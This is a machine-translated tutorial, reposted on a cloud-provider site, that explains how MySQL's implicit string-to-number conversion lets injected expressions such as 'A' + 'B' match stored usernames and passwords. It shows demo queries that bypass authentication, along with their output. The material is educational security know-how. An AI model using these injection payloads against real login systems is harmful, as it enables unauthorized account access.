Use of mysql implicit conversion in Injection

Last Update:2013-11-20 Source: Internet

Author: User

Tags mysql manual

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

The author is so careful. I will share my notes with my blog followers. for ease of understanding, the injection examples of implicit conversions can be analyzed directly. CREATE a TABLE and add two users to create table 'users' ('userid' int (11) not null AUTO_INCREMENT, 'username' varchar (45) not null, 'Password' varchar (45) not null, primary key ('userid'); insert into 'users' ('username', 'Password') VALUES ('admin ', 'mysupers3cretpass! '); Insert into 'users' ('username', 'Password') VALUES ('666admin', 'natasmai '); see the following query for mysql> SELECT * FROM users WHERE username = 'A' + 'B' AND password = 'A' + 'B '; + --- + ---- + ------- + | userid | username | password | + --- + ---- + ------- + | 1 | admin | MySuperS3cretPass! | + --- + ---- + ------- + 1 row in set, 7 warnings (0.00 sec) mysql> show warnings; + --- + -- + ----------------- + | Level | Code | Message | + --- + -- + ------------------- + | Warning | 1292 | Truncated incorrect DOUBLE value: 'admin' | Warning | 1292 | Truncated incorrect DOUBLE value: 'B' | Warning | 1292 | Truncated incorrect DOUBLE value: 'A' | Warning | 1292 | Truncated incorrect DOUBLE value: 'mysupers3c RetPass! '| Warning | 1292 | Truncated incorrect DOUBLE value:' B '| Warning | 1292 | Truncated incorrect DOUBLE value: 'A' | Warning | 1292 | Truncated incorrect DOUBLE value: '666admin' | + --- + -- + ------------------- + 7 rows in set (0.00 sec) curious about the result. yes. implicit conversion injection is used here. let's analyze the principle. mysql> SELECT 1 + 1; + -- + | 1 + 1 | + -- + | 2 | + -- + 1 row in set (0.00 sec) there is no problem with the above query... I won't talk about it here .. next, mysql> SELECT 'foo' + 1; + --- + | 'foo' + 1 | + --- + | 1 | + --- + 1 row in set, 1 warning (0.00 sec) mysql> show warnings; + --- + -- + -------------- + | Level | Code | Message | + --- + -- + -------------- + | Warning | 1292 | Truncated incorrect DOUBLE value: 'foo' | + --- + -- + -------------- + 1 row in set (0.00 sec) implicit conversion occurs here, and the query result is 1. here, 'foo' is converted to the double type. but apparently he is not a number, so he will convert it to 0. mysql manual Description: When an operator is used Operands of different types, type conversion occurs to make the operands compatible. What about adding two strings? Do not need to be converted? Run mysql> SELECT 'A' + 'B' in the following SQL statement '; + --- + | 'A' + 'B' | + --- + | 0 | + --- + 1 row in set, 2 warnings (0.00 sec) mysql> SHOW WARNINGS; + --- + -- + ------------- + | Level | Code | Message | + --- + -- + ------------- + | Warning | 1292 | Truncated incorrect DOUBLE value: 'B' | Warning | 1292 | Truncated incorrect DOUBLE value: 'A' | + --- + -- + ------------- + 2 rows in set (0.00 sec) Here + is an arithmetic operator. the two strings are converted to numeric values. 0 + 0 .. the result is 0. the sum of the two strings is 0. through the query, we know that the result of SELECT 'A' + 'B' = 0 is true (the value is 1 ). then compare the two strings and the other strings. mysql> SELECT 'A' + 'B' = 'C '; + ----- + | 'A' + 'B' = 'C' | + ----- + | 1 | + ----- + 1 row in set, 3 warnings (0.00 sec) mysql> show warnings; + --- + -- + ------------- + | Level | Code | Message | + --- + -- + ------------- + | Warning | 1292 | Truncated incorrect DOUBLE value: 'B' | Warning | 1292 | Truncated incorrect DOUBLE value: 'A' | Warning | 1292 | T Runcated incorrect DOUBLE value: 'C' | + --- + -- + ------------- + 3 rows in set (0.00 sec) from warning we can see that all of them are implicitly converted. query execution should be select 0 = 0... The result is 1. mysql manual Description: In all other cases, the arguments are compared as floating-point (real) numbers. now, let's get to know the case at the beginning of the article. SELECT * FROM users WHERE username = 'A' + 'B' AND password = 'A' + 'B'; values are implicitly converted AND compared during query. for example, the username process of the first record should be like this .. the result of select 'admin' = 'A' + 'B' is naturally 1, and the password is similar. when the second record arrives, select '666admin' = 'A' + 'B' to further analyze select 666 = 'A' + 'B'. The result is false. the value is 0. so the query results in the first case are like that... If the query meets the second condition select '666admin' = 666, the statement is as follows: mysql> SELECT * FROM users WHERE username = 'A' + '000000' AND password = 'A' + 'B '; + --- + ---- + | userid | username | password | + --- + ---- + | 2 | 666 admin | nataSamI | + --- + ---- + 1 row in set, 6 warnings (0.00 sec) more operators can be used here...
Reference http://vagosec.org/2013/04/mysql-implicit-type-conversion/

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More